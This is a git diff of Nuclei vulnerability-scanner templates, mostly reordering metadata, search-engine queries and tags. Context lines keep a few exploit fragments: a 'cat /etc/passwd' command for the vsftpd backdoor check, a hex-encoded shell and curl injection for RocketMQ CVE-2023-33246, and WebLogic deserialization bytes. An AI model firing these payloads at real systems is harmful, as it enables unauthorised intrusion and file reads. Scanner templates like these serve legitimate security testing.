js,redis,network,enum javascript: - code: | const redis = require('nuclei/redis'); diff --git a/javascript/enumeration/redis/redis-require-auth.yaml b/javascript/enumeration/redis/redis-require-auth.yaml index 933d643384..84c8c76f26 100644 --- a/javascript/enumeration/redis/redis-require-auth.yaml +++ b/javascript/enumeration/redis/redis-require-auth.yaml @@ -10,9 +10,20 @@ info: - https://docs.projectdiscovery.io/templates/protocols/javascript/modules/redis#isauthenticated metadata: max-request: 1 - shodan-query: product:"redis" - tags: js,redis,network - + shodan-query: + - product:"redis" + - http.title:"airflow - dags" || http.html:"apache airflow" + - http.title:"sign in - airflow" + product: airflow + vendor: apache + fofa-query: + - apache airflow + - title="airflow - dags" || http.html:"apache airflow" + - title="sign in - airflow" + google-query: + - intitle:"airflow - dags" || http.html:"apache airflow" + - intitle:"sign in - airflow" + tags: js,redis,network,enum javascript: - code: | const redis = require('nuclei/redis'); diff --git a/javascript/enumeration/rsync/rsync-list-modules.yaml b/javascript/enumeration/rsync/rsync-list-modules.yaml index c7f1f4e9c3..785d2a7974 100644 --- a/javascript/enumeration/rsync/rsync-list-modules.yaml +++ b/javascript/enumeration/rsync/rsync-list-modules.yaml @@ -10,10 +10,9 @@ info: - https://nmap.org/nsedoc/scripts/rsync-list-modules.html metadata: verified: true - shodan-query: port:873 max-request: 1 - tags: network,rsync,enum - + shodan-query: port:873 + tags: network,rsync,enum,js javascript: - code: | const c = require("nuclei/net"); diff --git a/javascript/enumeration/smb/smb-default-creds.yaml b/javascript/enumeration/smb/smb-default-creds.yaml index c780d674b0..7830a24b49 100644 --- a/javascript/enumeration/smb/smb-default-creds.yaml +++ b/javascript/enumeration/smb/smb-default-creds.yaml @@ -12,8 +12,9 @@ info: verified: true max-request: 9 shodan-query: "port:445" + product: dionaea + vendor: dionaea tags: js,network,smb,enum,default,bruteforce - javascript: - code: | var m = require("nuclei/smb"); diff --git a/javascript/enumeration/smb/smb-enum-domains.yaml b/javascript/enumeration/smb/smb-enum-domains.yaml index 567ab2d3a3..b66477cc2d 100644 --- a/javascript/enumeration/smb/smb-enum-domains.yaml +++ b/javascript/enumeration/smb/smb-enum-domains.yaml @@ -12,6 +12,8 @@ info: verified: true max-request: 1 shodan-query: port:445 + product: dionaea + vendor: dionaea tags: js,network,smb,enum javascript: - code: | diff --git a/javascript/enumeration/smb/smb-enum.yaml b/javascript/enumeration/smb/smb-enum.yaml index 628c6c0237..6f689a7616 100644 --- a/javascript/enumeration/smb/smb-enum.yaml +++ b/javascript/enumeration/smb/smb-enum.yaml @@ -13,8 +13,9 @@ info: verified: true max-request: 1 shodan-query: port:445 + product: dionaea + vendor: dionaea tags: js,network,smb,enum - javascript: - code: | var m = require("nuclei/smb"); diff --git a/javascript/enumeration/smb/smb-os-detect.yaml b/javascript/enumeration/smb/smb-os-detect.yaml index 59b4d0ada9..89c2dc17b0 100644 --- a/javascript/enumeration/smb/smb-os-detect.yaml +++ b/javascript/enumeration/smb/smb-os-detect.yaml @@ -11,6 +11,8 @@ info: metadata: max-request: 1 shodan-query: "port:445" + product: dionaea + vendor: dionaea tags: js,network,smb,enum,os javascript: - code: | diff --git a/javascript/enumeration/smb/smb-version-detect.yaml b/javascript/enumeration/smb/smb-version-detect.yaml index d9a5febdf5..e685879ca4 100644 --- a/javascript/enumeration/smb/smb-version-detect.yaml +++ b/javascript/enumeration/smb/smb-version-detect.yaml @@ -9,6 +9,8 @@ info: metadata: max-request: 1 shodan-query: "port:445" + product: dionaea + vendor: dionaea tags: js,network,smb,enum javascript: - code: | diff --git a/javascript/enumeration/smb/smb2-capabilities.yaml b/javascript/enumeration/smb/smb2-capabilities.yaml index 5cac17bd03..c5f650b03c 100644 --- a/javascript/enumeration/smb/smb2-capabilities.yaml +++ b/javascript/enumeration/smb/smb2-capabilities.yaml @@ -11,8 +11,9 @@ info: metadata: max-request: 1 shodan-query: port:445 + product: dionaea + vendor: dionaea tags: js,network,smb,enum - javascript: - code: | var m = require("nuclei/smb"); diff --git a/javascript/enumeration/smb/smb2-server-time.yaml b/javascript/enumeration/smb/smb2-server-time.yaml index 79a88597c4..643706024f 100644 --- a/javascript/enumeration/smb/smb2-server-time.yaml +++ b/javascript/enumeration/smb/smb2-server-time.yaml @@ -12,6 +12,8 @@ info: verified: true max-request: 1 shodan-query: "port:445" + product: dionaea + vendor: dionaea tags: js,network,smb,enum javascript: - code: | diff --git a/javascript/misconfiguration/pgsql/pgsql-empty-password.yaml b/javascript/misconfiguration/pgsql/pgsql-empty-password.yaml index 33be6e165f..4679a87052 100644 --- a/javascript/misconfiguration/pgsql/pgsql-empty-password.yaml +++ b/javascript/misconfiguration/pgsql/pgsql-empty-password.yaml @@ -9,10 +9,10 @@ info: reference: - https://www.tenable.com/plugins/nessus/104031 metadata: - shodan-query: product:"PostgreSQL" verified: true + max-request: 1 + shodan-query: "product:\"PostgreSQL\"" tags: js,network,postgresql,authenticated - javascript: - code: | const postgres = require('nuclei/postgres'); diff --git a/javascript/misconfiguration/pgsql/pgsql-extensions-rce.yaml b/javascript/misconfiguration/pgsql/pgsql-extensions-rce.yaml index 9f2deb4d9c..e68933dcb5 100644 --- a/javascript/misconfiguration/pgsql/pgsql-extensions-rce.yaml +++ b/javascript/misconfiguration/pgsql/pgsql-extensions-rce.yaml @@ -11,10 +11,10 @@ info: - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#using-libcso6 - https://hacktricks.boitatech.com.br/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions metadata: - shodan-query: product:"PostgreSQL" verified: true + max-request: 1 + shodan-query: "product:\"PostgreSQL\"" tags: postgresql,js,network,rce - javascript: - code: | const postgres = require('nuclei/postgres'); diff --git a/javascript/misconfiguration/smb/smb-anonymous-access.yaml b/javascript/misconfiguration/smb/smb-anonymous-access.yaml index a6fbf3ab5a..d944b35ba8 100644 --- a/javascript/misconfiguration/smb/smb-anonymous-access.yaml +++ b/javascript/misconfiguration/smb/smb-anonymous-access.yaml @@ -12,6 +12,8 @@ info: verified: true max-request: 1 shodan-query: port:445 + product: dionaea + vendor: dionaea tags: js,network,smb,enum,misconfig javascript: - code: | diff --git a/javascript/misconfiguration/smb/smb-shares.yaml b/javascript/misconfiguration/smb/smb-shares.yaml index fb0194af93..f024f4edf3 100644 --- a/javascript/misconfiguration/smb/smb-shares.yaml +++ b/javascript/misconfiguration/smb/smb-shares.yaml @@ -12,6 +12,8 @@ info: verified: true max-request: 1 shodan-query: port:445 + product: dionaea + vendor: dionaea tags: js,network,smb,enum javascript: - code: | diff --git a/javascript/misconfiguration/smb/smb-signing-not-required.yaml b/javascript/misconfiguration/smb/smb-signing-not-required.yaml index 66e9b13f22..822f70b5f1 100644 --- a/javascript/misconfiguration/smb/smb-signing-not-required.yaml +++ b/javascript/misconfiguration/smb/smb-signing-not-required.yaml @@ -13,6 +13,8 @@ info: verified: true max-request: 1 shodan-query: port:445 + product: dionaea + vendor: dionaea tags: js,network,smb,enum javascript: - code: | diff --git a/javascript/udp/detection/tftp-detect.yaml b/javascript/udp/detection/tftp-detect.yaml index 4fa3ae1353..a67707ee43 100644 --- a/javascript/udp/detection/tftp-detect.yaml +++ b/javascript/udp/detection/tftp-detect.yaml @@ -8,9 +8,9 @@ info: Detect TFTP Service. metadata: verified: true - shodan-query: port:69 + max-request: 1 + shodan-query: "port:69" tags: js,tftp,udp,network - javascript: - code: | let packet = bytes.NewBuffer(); diff --git a/network/backdoor/backdoored-zte.yaml b/network/backdoor/backdoored-zte.yaml index 7515aa50d6..e9ce27c899 100644 --- a/network/backdoor/backdoored-zte.yaml +++ b/network/backdoor/backdoored-zte.yaml @@ -13,11 +13,10 @@ info: cvss-score: 10 cwe-id: CWE-912 metadata: + verified: true max-request: 1 shodan-query: http.html:"ZTE Corporation" - verified: true - tags: edb,network,zte,telnet,backdoor,router - + tags: edb,network,zte,telnet,backdoor,router,tcp tcp: - host: - "{{Hostname}}" diff --git a/network/c2/darkcomet-trojan.yaml b/network/c2/darkcomet-trojan.yaml index 54644dbf4f..47b869ad69 100644 --- a/network/c2/darkcomet-trojan.yaml +++ b/network/c2/darkcomet-trojan.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: product:'DarkComet Trojan' - tags: network,c2,ir,osint,cti,darkcomet + tags: network,c2,ir,osint,cti,darkcomet,tcp tcp: - inputs: diff --git a/network/c2/darktrack-rat-trojan.yaml b/network/c2/darktrack-rat-trojan.yaml index 58dcfa2785..99be59b8bb 100644 --- a/network/c2/darktrack-rat-trojan.yaml +++ b/network/c2/darktrack-rat-trojan.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: product:'DarkTrack RAT Trojan' - tags: network,c2,ir,osint,cti,darktrack,rat + tags: network,c2,ir,osint,cti,darktrack,rat,tcp tcp: - inputs: diff --git a/network/c2/orcus-rat-trojan.yaml b/network/c2/orcus-rat-trojan.yaml index 596f5cbb52..9c095a75ec 100644 --- a/network/c2/orcus-rat-trojan.yaml +++ b/network/c2/orcus-rat-trojan.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: product:'Orcus RAT Trojan' - tags: network,c2,ir,osint,cti,orcus,rat + tags: network,c2,ir,osint,cti,orcus,rat,tcp tcp: - inputs: diff --git a/network/c2/xtremerat-trojan.yaml b/network/c2/xtremerat-trojan.yaml index 2ea34e8eca..9b032933af 100644 --- a/network/c2/xtremerat-trojan.yaml +++ b/network/c2/xtremerat-trojan.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: product:'XtremeRAT Trojan' - tags: network,c2,ir,osint,cti,xtreamerat + tags: network,c2,ir,osint,cti,xtreamerat,tcp tcp: - inputs: diff --git a/network/cves/2001/CVE-2001-1473.yaml b/network/cves/2001/CVE-2001-1473.yaml index ecb7eb0621..51030400d8 100644 --- a/network/cves/2001/CVE-2001-1473.yaml +++ b/network/cves/2001/CVE-2001-1473.yaml @@ -5,24 +5,26 @@ info: author: iamthefrogy severity: high description: SSHv1 is deprecated and has known cryptographic issues. + remediation: Upgrade to SSH 2.4 or later. reference: - https://www.kb.cert.org/vuls/id/684820 - https://nvd.nist.gov/vuln/detail/CVE-2001-1473 - http://www.kb.cert.org/vuls/id/684820 - https://exchange.xforce.ibmcloud.com/vulnerabilities/6603 - remediation: Upgrade to SSH 2.4 or later. + - https://github.com/codine7/jungle classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2001-1473 cwe-id: CWE-310 - cpe: cpe:2.3:a:ssh:ssh:1.2.24:*:*:*:*:*:*:* epss-score: 0.00258 + epss-percentile: 0.65484 + cpe: cpe:2.3:a:ssh:ssh:1.2.24:*:*:*:*:*:*:* metadata: max-request: 1 - product: ssh vendor: ssh - tags: network,cve2001,cve,ssh,openssh + product: ssh + tags: network,cve2001,cve,ssh,openssh,tcp tcp: - host: - "{{Hostname}}" diff --git a/network/cves/2011/CVE-2011-2523.yaml b/network/cves/2011/CVE-2011-2523.yaml index 2991dbe5a7..5949e837f6 100644 --- a/network/cves/2011/CVE-2011-2523.yaml +++ b/network/cves/2011/CVE-2011-2523.yaml @@ -21,7 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2011-2523 cwe-id: CWE-78 - epss-score: 0.87236 + epss-score: 0.85861 + epss-percentile: 0.98557 cpe: cpe:2.3:a:vsftpd_project:vsftpd:2.3.4:*:*:*:*:*:*:* metadata: verified: true @@ -29,7 +30,7 @@ info: vendor: vsftpd_project product: vsftpd shodan-query: product:"vsftpd" - tags: cve2011,network,cve,vsftpd,ftp,backdoor,vsftpd_project + tags: packetstorm,cve2011,network,cve,vsftpd,ftp,backdoor,vsftpd_project,tcp variables: cmd: "cat /etc/passwd" # shows the the user and group names and numeric IDs tcp: diff --git a/network/cves/2015/CVE-2015-3306.yaml b/network/cves/2015/CVE-2015-3306.yaml index 76be3c6f5c..aa7c1c8884 100644 --- a/network/cves/2015/CVE-2015-3306.yaml +++ b/network/cves/2015/CVE-2015-3306.yaml @@ -19,13 +19,15 @@ info: cvss-score: 10 cve-id: CVE-2015-3306 cwe-id: CWE-284 + epss-score: 0.97091 + epss-percentile: 0.99775 cpe: cpe:2.3:a:proftpd:proftpd:1.3.5:*:*:*:*:*:*:* - epss-score: 0.97267 metadata: max-request: 1 - product: proftpd vendor: proftpd - tags: cve2015,cve,network,ftp,rce,proftpd,edb + product: proftpd + shodan-query: cpe:"cpe:2.3:a:proftpd:proftpd" + tags: cve2015,cve,network,ftp,rce,proftpd,edb,tcp tcp: - host: - "{{Hostname}}" diff --git a/network/cves/2016/CVE-2016-2004.yaml b/network/cves/2016/CVE-2016-2004.yaml index ea7e238e3a..5813c46ebb 100644 --- a/network/cves/2016/CVE-2016-2004.yaml +++ b/network/cves/2016/CVE-2016-2004.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: hp product: data_protector - tags: packetstorm,cve,cve2016,network,iot,hp,rce,edb + tags: packetstorm,cve,cve2016,network,iot,hp,rce,edb,tcp tcp: - host: - "{{Hostname}}" diff --git a/network/cves/2016/CVE-2016-3510.yaml b/network/cves/2016/CVE-2016-3510.yaml index 64e8374d4e..66c42943ab 100644 --- a/network/cves/2016/CVE-2016-3510.yaml +++ b/network/cves/2016/CVE-2016-3510.yaml @@ -19,15 +19,20 @@ info: cvss-score: 9.8 cve-id: CVE-2016-3510 cwe-id: CWE-119 - epss-score: 0.04254 - epss-percentile: 0.92018 + epss-score: 0.04407 + epss-percentile: 0.92379 cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: oracle product: weblogic_server - tags: packetstorm,cve,cve2016,oracle,weblogic,t3,rce,oast,deserialization,network + shodan-query: + - product:"oracle weblogic" + - http.title:"oracle peoplesoft sign-in" + fofa-query: title="oracle peoplesoft sign-in" + google-query: intitle:"oracle peoplesoft sign-in" + tags: packetstorm,cve,cve2016,oracle,weblogic,t3,rce,oast,deserialization,network,tcp variables: start: "016501ffffffffffffffff000000710000ea6000000018432ec6a2a63985b5af7d63e64383f42a6d92c9e9af0f9472027973720078720178720278700000000c00000002000000000000000000000001007070707070700000000c00000002000000000000000000000001007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200094900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000" end: "fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200074900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200094900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c00007870774621000000000000000000093132372e302e312e31000b75732d6c2d627265656e73a53caff10000000700001b59ffffffffffffffffffffffffffffffffffffffffffffffff0078fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c00007870771d018140128134bf427600093132372e302e312e31a53caff1000000000078" diff --git a/network/cves/2017/CVE-2017-3881.yaml b/network/cves/2017/CVE-2017-3881.yaml index cb805c9198..c1544c488b 100644 --- a/network/cves/2017/CVE-2017-3881.yaml +++ b/network/cves/2017/CVE-2017-3881.yaml @@ -27,7 +27,10 @@ info: max-request: 2 vendor: cisco product: ios - tags: cve2017,network,cve,cisco,rce,kev,msf + shodan-query: + - product:"cisco ios http config" + - cpe:"cpe:2.3:o:cisco:ios" + tags: cve2017,network,cve,cisco,rce,kev,msf,tcp tcp: - host: - "{{Hostname}}" diff --git a/network/cves/2017/CVE-2017-5645.yaml b/network/cves/2017/CVE-2017-5645.yaml index fa34d154c7..1d74565167 100644 --- a/network/cves/2017/CVE-2017-5645.yaml +++ b/network/cves/2017/CVE-2017-5645.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: apache product: log4j - tags: cve,cve2017,network,vulhub,apache,log4j,rce,deserialization,oast + tags: cve,cve2017,network,vulhub,apache,log4j,rce,deserialization,oast,tcp variables: end: "\r\n" tcp: diff --git a/network/cves/2018/CVE-2018-2628.yaml b/network/cves/2018/CVE-2018-2628.yaml index 3f817a5326..749a1f58ef 100644 --- a/network/cves/2018/CVE-2018-2628.yaml +++ b/network/cves/2018/CVE-2018-2628.yaml @@ -27,7 +27,12 @@ info: max-request: 1 vendor: oracle product: weblogic_server - tags: network,cve2018,cve,oracle,weblogic,deserialization,kev + shodan-query: + - product:"oracle weblogic" + - http.title:"oracle peoplesoft sign-in" + fofa-query: title="oracle peoplesoft sign-in" + google-query: intitle:"oracle peoplesoft sign-in" + tags: network,cve2018,cve,oracle,weblogic,deserialization,kev,tcp tcp: - host: - "{{Hostname}}" diff --git a/network/cves/2018/CVE-2018-2893.yaml b/network/cves/2018/CVE-2018-2893.yaml index 65356e9fef..c18857b3b2 100644 --- a/network/cves/2018/CVE-2018-2893.yaml +++ b/network/cves/2018/CVE-2018-2893.yaml @@ -26,7 +26,12 @@ info: max-request: 2 vendor: oracle product: weblogic_server - tags: cve,cve2018,weblogic,network,deserialization,rce,oracle + shodan-query: + - product:"oracle weblogic" + - http.title:"oracle peoplesoft sign-in" + fofa-query: title="oracle peoplesoft sign-in" + google-query: intitle:"oracle peoplesoft sign-in" + tags: cve,cve2018,weblogic,network,deserialization,rce,oracle,tcp tcp: - inputs: - data: "t3 12.2.1 diff --git a/network/cves/2020/CVE-2020-11981.yaml b/network/cves/2020/CVE-2020-11981.yaml index a71f9ce3bb..61dc37fb68 100644 --- a/network/cves/2020/CVE-2020-11981.yaml +++ b/network/cves/2020/CVE-2020-11981.yaml @@ -20,16 +20,26 @@ info: cvss-score: 9.8 cve-id: CVE-2020-11981 cwe-id: CWE-78 - epss-score: 0.9386 - epss-percentile: 0.99081 + epss-score: 0.93315 + epss-percentile: 0.99068 cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: apache product: airflow - shodan-query: product:"redis" - tags: cve,cve2020,network,redis,unauth,apache,airflow,vulhub,intrusive + shodan-query: + - product:"redis" + - http.title:"airflow - dags" || http.html:"apache airflow" + - http.title:"sign in - airflow" + fofa-query: + - apache airflow + - title="airflow - dags" || http.html:"apache airflow" + - title="sign in - airflow" + google-query: + - intitle:"airflow - dags" || http.html:"apache airflow" + - intitle:"sign in - airflow" + tags: cve,cve2020,network,redis,unauth,apache,airflow,vulhub,intrusive,tcp variables: data: "*3\r diff --git a/network/cves/2020/CVE-2020-1938.yaml b/network/cves/2020/CVE-2020-1938.yaml index cf19b20244..936779fb43 100644 --- a/network/cves/2020/CVE-2020-1938.yaml +++ b/network/cves/2020/CVE-2020-1938.yaml @@ -26,8 +26,12 @@ info: max-request: 4 vendor: apache product: geode - shodan-query: title:"Apache Tomcat" - tags: cve,cve2020,kev,tenable,apache,lfi,network,tomcat,ajp + shodan-query: + - title:"Apache Tomcat" + - http.title:"apache tomcat" + fofa-query: title="apache tomcat" + google-query: intitle:"apache tomcat" + tags: cve,cve2020,kev,tenable,apache,lfi,network,tomcat,ajp,tcp tcp: - host: - "{{Hostname}}" diff --git a/network/cves/2021/CVE-2021-44521.yaml b/network/cves/2021/CVE-2021-44521.yaml index dfedb77d30..18c38425a6 100644 --- a/network/cves/2021/CVE-2021-44521.yaml +++ b/network/cves/2021/CVE-2021-44521.yaml @@ -20,14 +20,15 @@ info: cvss-score: 9.1 cve-id: CVE-2021-44521 cwe-id: CWE-732,CWE-94 - epss-score: 0.04594 - epss-percentile: 0.92315 + epss-score: 0.05417 + epss-percentile: 0.93135 cpe: cpe:2.3:a:apache:cassandra:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: apache product: cassandra - tags: cve,cve2021,network,rce,apache,cassandra + shodan-query: cpe:"cpe:2.3:a:apache:cassandra" + tags: cve,cve2021,network,rce,apache,cassandra,tcp tcp: - host: - "{{Hostname}}" diff --git a/network/cves/2022/CVE-2022-0543.yaml b/network/cves/2022/CVE-2022-0543.yaml index 1b2082a1d0..514fe8af8e 100644 --- a/network/cves/2022/CVE-2022-0543.yaml +++ b/network/cves/2022/CVE-2022-0543.yaml @@ -25,12 +25,13 @@ info: epss-score: 0.97184 cpe: cpe:2.3:a:redis:redis:-:*:*:*:*:*:*:* metadata: - vendor: redis max-request: 2 + vendor: redis product: redis - shodan-query: redis_version - tags: cve,cve2022,network,redis,unauth,rce,kev - + shodan-query: + - redis_version + - redis + tags: cve,cve2022,network,redis,unauth,rce,kev,tcp tcp: - host: - "{{Hostname}}" diff --git a/network/cves/2022/CVE-2022-24706.yaml b/network/cves/2022/CVE-2022-24706.yaml index 0dc99a7dc2..b032f1d7c3 100644 --- a/network/cves/2022/CVE-2022-24706.yaml +++ b/network/cves/2022/CVE-2022-24706.yaml @@ -29,8 +29,11 @@ info: max-request: 2 vendor: apache product: couchdb - shodan-query: product:"CouchDB" - tags: cve2022,network,cve,couch,rce,kev,couchdb,apache + shodan-query: + - product:"CouchDB" + - product:"couchdb" + - cpe:"cpe:2.3:a:apache:couchdb" + tags: cve2022,network,cve,couch,rce,kev,couchdb,apache,tcp variables: name_msg: "00156e00050007499c4141414141414041414141414141" challenge_reply: "00157201020304" diff --git a/network/cves/2022/CVE-2022-31793.yaml b/network/cves/2022/CVE-2022-31793.yaml index 0d5e0514ca..42baa69b63 100644 --- a/network/cves/2022/CVE-2022-31793.yaml +++ b/network/cves/2022/CVE-2022-31793.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: inglorion product: muhttpd - tags: network,cve,cve2022,muhttpd,lfi,unauth,inglorion + tags: network,cve,cve2022,muhttpd,lfi,unauth,inglorion,tcp tcp: - host: - "{{Hostname}}" diff --git a/network/cves/2023/CVE-2023-33246.yaml b/network/cves/2023/CVE-2023-33246.yaml index 9dcedde472..a021f4f488 100644 --- a/network/cves/2023/CVE-2023-33246.yaml +++ b/network/cves/2023/CVE-2023-33246.yaml @@ -20,16 +20,25 @@ info: cvss-score: 9.8 cve-id: CVE-2023-33246 cwe-id: CWE-94 - cpe: cpe:2.3:a:apache:rocketmq:*:*:*:*:*:*:*:* epss-score: 0.95581 + cpe: cpe:2.3:a:apache:rocketmq:*:*:*:*:*:*:*:* metadata: - fofa-query: protocol="rocketmq" - max-request: 1 - product: rocketmq - shodan-query: title:"RocketMQ" - vendor: apache verified: true - tags: network,cve2023,cve,rocketmq,rce,oast,intrusive,apache + max-request: 1 + vendor: apache + product: rocketmq + shodan-query: + - title:"RocketMQ" + - http.title:"rocketmq-console-ng" + - http.title:"rocketmq" + fofa-query: + - protocol="rocketmq" + - title="rocketmq-console-ng" + - title="rocketmq" + google-query: + - intitle:"rocketmq" + - intitle:"rocketmq-console-ng" + tags: packetstorm,network,cve2023,cve,rocketmq,rce,oast,intrusive,apache,tcp variables: part_a: '{{ hex_decode ("000000d2000000607b22636f6465223a32352c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a302c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3339357d66696c7465725365727665724e756d733d310a726f636b65746d71486f6d653d2d632024407c7368202e206563686f206375726c20") }}' part_b: '{{ hex_decode("3b0a") }}' diff --git a/network/default-login/ftp-anonymous-login.yaml b/network/default-login/ftp-anonymous-login.yaml index 25a8deb085..ea3ab6d42b 100644 --- a/network/default-login/ftp-anonymous-login.yaml +++ b/network/default-login/ftp-anonymous-login.yaml @@ -10,7 +10,7 @@ info: - https://tools.ietf.org/html/rfc2577 metadata: max-request: 1 - tags: network,ftp,default-login + tags: network,ftp,default-login,tcp tcp: - inputs: diff --git a/network/default-login/ftp-weak-credentials.yaml b/network/default-login/ftp-weak-credentials.yaml index f28f01cf1f..da3048edb0 100644 --- a/network/default-login/ftp-weak-credentials.yaml +++ b/network/default-login/ftp-weak-credentials.yaml @@ -12,7 +12,7 @@ info: cvss-score: 8.5 metadata: max-request: 1 - tags: network,ftp,default-login,service + tags: network,ftp,default-login,service,tcp tcp: diff --git a/network/default-login/ldap-anonymous-login.yaml b/network/default-login/ldap-anonymous-login.yaml index 3141f0b300..10f4483c69 100644 --- a/network/default-login/ldap-anonymous-login.yaml +++ b/network/default-login/ldap-anonymous-login.yaml @@ -5,18 +5,17 @@ info: author: s0obi severity: medium description: The remote LDAP server allows anonymous access + remediation: Configure the service to disallow NULL BINDs. reference: - https://ldap.com/ldapv3-wire-protocol-reference-bind - https://www.mowasay.com/2016/01/windows-how-do-i-disable-or-enable-anonymous-ldap-binds-to-windows-server-2008-r2-active-directory-ad/ - remediation: Configure the service to disallow NULL BINDs. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-284 metadata: max-request: 1 - tags: network,ldap,default-login,tenable - + tags: network,ldap,default-login,tenable,tcp tcp: - inputs: - data: 300c020101600702010304008000 diff --git a/network/detection/activemq-openwire-transport-detect.yaml b/network/detection/activemq-openwire-transport-detect.yaml index ff4cf39ecc..c1ebb0eb00 100644 --- a/network/detection/activemq-openwire-transport-detect.yaml +++ b/network/detection/activemq-openwire-transport-detect.yaml @@ -7,11 +7,10 @@ info: description: | OpenWire is the native protocol that Apache ActiveMQ uses. It is designed for performance and size on the wire - sacrificing some ease of implementation with higher performance and reduced network bandwidth as a priority. metadata: + verified: true max-request: 1 shodan-query: product:"ActiveMQ OpenWire transport" - verified: true - tags: network,activemq,detect,openwire - + tags: network,activemq,detect,openwire,detection,tcp tcp: - inputs: - data: "VERSION" diff --git a/network/detection/aix-websm-detect.yaml b/network/detection/aix-websm-detect.yaml index f2e5746791..8b015d2de1 100644 --- a/network/detection/aix-websm-detect.yaml +++ b/network/detection/aix-websm-detect.yaml @@ -10,11 +10,10 @@ info: - https://en.wikipedia.org/wiki/IBM_Web-based_System_Manager - https://www.filibeto.org/unix/aix/lib/rel/5.2/wsmadmn.pdf metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: "/websm/" - tags: network,aix,detect - + tags: network,aix,detect,detection,tcp tcp: - inputs: - data: "en_US\r\n" diff --git a/network/detection/apache-activemq-detect.yaml b/network/detection/apache-activemq-detect.yaml index a6428320a2..42d4e58fcd 100644 --- a/network/detection/apache-activemq-detect.yaml +++ b/network/detection/apache-activemq-detect.yaml @@ -7,11 +7,10 @@ info: description: | Apache ActiveMQ is an open source message broker written in Java together with a full Java Message Service client. It provides "Enterprise Features" which in this case means fostering the communication from more than one client or server. metadata: + verified: true max-request: 1 shodan-query: product:"Apache ActiveMQ" - verified: true - tags: network,activemq,oss,detect,apache - + tags: network,activemq,oss,detect,apache,detection,tcp tcp: - inputs: - data: "HELP\n\n\u0000" diff --git a/network/detection/aws-sftp-detect.yaml b/network/detection/aws-sftp-detect.yaml index 2294a4a534..b4c87c6dc1 100644 --- a/network/detection/aws-sftp-detect.yaml +++ b/network/detection/aws-sftp-detect.yaml @@ -12,11 +12,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: SSH-2.0-AWS_SFTP_1.1 - tags: network,ssh,detect,aws,sftp - + tags: network,ssh,detect,aws,sftp,detection,tcp tcp: - host: - "{{Hostname}}" diff --git a/network/detection/axigen-mail-server-detect.yaml b/network/detection/axigen-mail-server-detect.yaml index 86d00cf935..cfbd5a0184 100644 --- a/network/detection/axigen-mail-server-detect.yaml +++ b/network/detection/axigen-mail-server-detect.yaml @@ -7,12 +7,11 @@ info: description: | Axigen Mail Server was detected. metadata: - fofa-query: app="axigen-Mail-Server" + verified: true max-request: 1 shodan-query: product:"Axigen" - verified: true - tags: network,axigen,detect,smtp - + fofa-query: app="axigen-Mail-Server" + tags: network,axigen,detect,smtp,detection,tcp tcp: - inputs: - data: "\n" diff --git a/network/detection/bgp-detect.yaml b/network/detection/bgp-detect.yaml index 0fd5b34941..d79e02c355 100644 --- a/network/detection/bgp-detect.yaml +++ b/network/detection/bgp-detect.yaml @@ -15,7 +15,7 @@ info: metadata: max-request: 1 shodan-query: product:"BGP" - tags: network,bgp,detect + tags: network,bgp,detect,detection,tcp tcp: - inputs: diff --git a/network/detection/bitvise-ssh-detect.yaml b/network/detection/bitvise-ssh-detect.yaml index 5b50595cd9..8d81ebb239 100644 --- a/network/detection/bitvise-ssh-detect.yaml +++ b/network/detection/bitvise-ssh-detect.yaml 